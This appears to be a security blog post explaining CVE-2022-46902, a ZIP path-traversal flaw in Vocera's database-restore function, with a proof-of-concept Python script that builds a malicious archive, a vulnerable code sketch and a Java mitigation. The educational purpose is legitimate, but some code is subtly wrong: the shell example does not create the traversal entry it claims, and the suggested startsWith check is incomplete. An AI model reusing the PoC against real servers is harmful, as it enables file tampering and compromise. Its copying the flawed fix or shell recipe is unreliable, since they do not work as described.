CVE CyberSecurity Database News

CVE-2022-46902 - Path Traversal in Vocera Server's Unzip Operation — Deep Dive and Exploit Walkthrough

Poster -

---

Disclosure:
In 2022, security researchers discovered a critical bug tracked as CVE-2022-46902 in *Vocera Report Server and Voice Server* (versions 5.x through 5.8). This vulnerability makes it possible for malicious actors to read, write, or overwrite files outside of a designated temporary directory during a ZIP restore operation—which can lead to sensitive data leaks or even full server compromise.

This long-read post covers the vulnerability mechanics, a proof-of-concept exploit, and best practices to protect against similar flaws.

Understanding the Issue

The Vocera Report Console comes with a *websocket* function built to help admins restore databases from a ZIP file. Generally, this ZIP contains a SQL import file. When the server unpacks the archive, it writes files to a set temporary directory.

Here’s the problem:
The server accepts file paths stored within the ZIP file and simply writes them out, *without* making sure they stay inside the intended temporary directory. Attackers can take advantage by putting special sequences in filenames—specifically, path traversal sequences like ../../—to place files anywhere on the file system where the server has write permissions.

The code looks roughly like this

// BAD CODE: simplified logic
foreach (entry in zipFile.entries()) {
    // Returns something like "myfile.sql" OR "../../outside.txt"
    String filename = entry.getName();
    File destFile = new File(tempDir, filename);

    // Writes file directly, no validation
    writeInputStreamToFile(entry.getInputStream(), destFile);
}

> Danger: If the ZIP file contains a file entry like ../../../../../etc/passwd, the code will overwrite /etc/passwd (if permissions allow).

1. Craft a Malicious ZIP Archive

Create a ZIP file where the internal file path contains traversal sequences.

Example using zip on Linux

mkdir evil
echo 'hacked!' > evil/../../../../tmp/evil.txt
zip -r evil.zip evil/

- This creates a ZIP with a file that will, when unzipped naively, write to /tmp/evil.txt.

Here’s a demonstration of a ZIP archive with path traversal, ready to exploit such vulnerabilities

import zipfile

zip_payload = zipfile.ZipFile('exploit.zip', 'w')
zip_payload.writestr('../../../../tmp/hacked_by_me.txt', 'You have been hacked!')
zip_payload.close()

- If this exploit.zip is imported via Vocera’s restore function, /tmp/hacked_by_me.txt will be created on the server, *outside* the intended directory.

Consequences

- File Overwrite or Creation: Attackers can drop webshells, malicious scripts, or tamper configuration or cron files.
- Sensitive File Read: In some setups, a crafted ZIP could extract files *into* the server’s trusted web app directories.
- Denial of Service: Target important system files (e.g., replacing /etc/passwd), causing system failures.

Vendor Response & Patch

Vocera’s advisory and updates:
- Vocera’s homepage
- CVE record: NVD — CVE-2022-46902

Vocera released a patch in later 5.8.x versions. The update introduces input validation, ensuring ZIP entries cannot escape the intended temporary directory.

Upgrade to a patched version (5.8.x or higher).

- Restrict upload/restore features to only trusted admins.

Monitor for suspicious file creations in system directories.

For Developers:
Never blindly trust ZIP archive entries. Sanitize before writing to disk.

A simple check (Java)

File destFile = new File(tempDir, filename).getCanonicalFile();
if (!destFile.getPath().startsWith(new File(tempDir).getCanonicalPath())) {
    throw new SecurityException("Directory traversal attempt detected!");
}

References

- NVD entry for CVE-2022-46902
- OWASP ZIP Path Traversal
- Vocera

Conclusion

CVE-2022-46902 is a textbook case showing why ZIP file handling must always include input validation. Anyone running an affected version of the Vocera Report or Voice Server should patch immediately and follow secure coding practices. Seemingly minor oversights in untrusted input processing can have huge security implications.

Stay secure, patch often, and always treat user data with suspicion!

*This post is an exclusive, simplified overview for security learners and sysadmins. Feel free to share and spread awareness.*

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/04/2023 18:19:00 UTC